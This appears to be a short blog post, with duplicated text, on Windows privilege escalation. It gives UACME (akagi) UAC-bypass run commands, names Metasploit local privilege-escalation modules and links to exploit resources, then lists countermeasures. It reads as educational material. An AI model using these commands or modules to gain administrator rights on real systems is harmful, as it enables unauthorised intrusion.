WINDOWS 8.1 PRIVILEGE ESCALATION BY BYPASSING UAC PHYSICALLY
This tool works as you can see in the picture in win 8.1, but it's like one time shot you won't be able to do it again and again. and for this attack you need to have physical access to the target system.
Run examples:
akagi32.exe 1
akagi64.exe 3
akagi32 1 c:\windows\system32\calc.exe
akagi64 3 c:\windows\system32\charmap.exe
Download : https://github.com/hfiref0x/UACME
PRIVILEGE ESCALATION WITH OLD WINDOWS 7 EXPLOITS
More Exploits : https://www.exploit-db.com/local/
More Reading :
https://azeria-labs.com/privilege-escalation/
https://blog.netspi.com/windows-privilege-escalation-part-1-local-administrator-privileges/
COUNTERMEASURES
Use PAM
Patch system regularely
Run Services as unprivileged accounts
Restrict access to the system programs
Use restricted groups
Audit windows events
Lock the BIOS
Disable USB ports if possible
Use drive encryption
This tool works as you can see in the picture in win 8.1, but it's like one time shot you won't be able to do it again and again. and for this attack you need to have physical access to the target system.
Run examples:
akagi32.exe 1
akagi64.exe 3
akagi32 1 c:\windows\system32\calc.exe
akagi64 3 c:\windows\system32\charmap.exe
Download : https://github.com/hfiref0x/UACME
PRIVILEGE ESCALATION WITH OLD WINDOWS 7 EXPLOITS
windows/local/bypassuac
windows/local/bypassuac_injection
windows/local/bypassuac_vbs
windows/local/ask
windows/local/ms16_032_secondary_logon_handle_privesc
windows/local/ms16_016_webdav
More Exploits : https://www.exploit-db.com/local/
More Reading :
https://azeria-labs.com/privilege-escalation/
https://blog.netspi.com/windows-privilege-escalation-part-1-local-administrator-privileges/
COUNTERMEASURES
Use PAM
Patch system regularely
Run Services as unprivileged accounts
Restrict access to the system programs
Use restricted groups
Audit windows events
Lock the BIOS
Disable USB ports if possible
Use drive encryption
No comments:
Post a Comment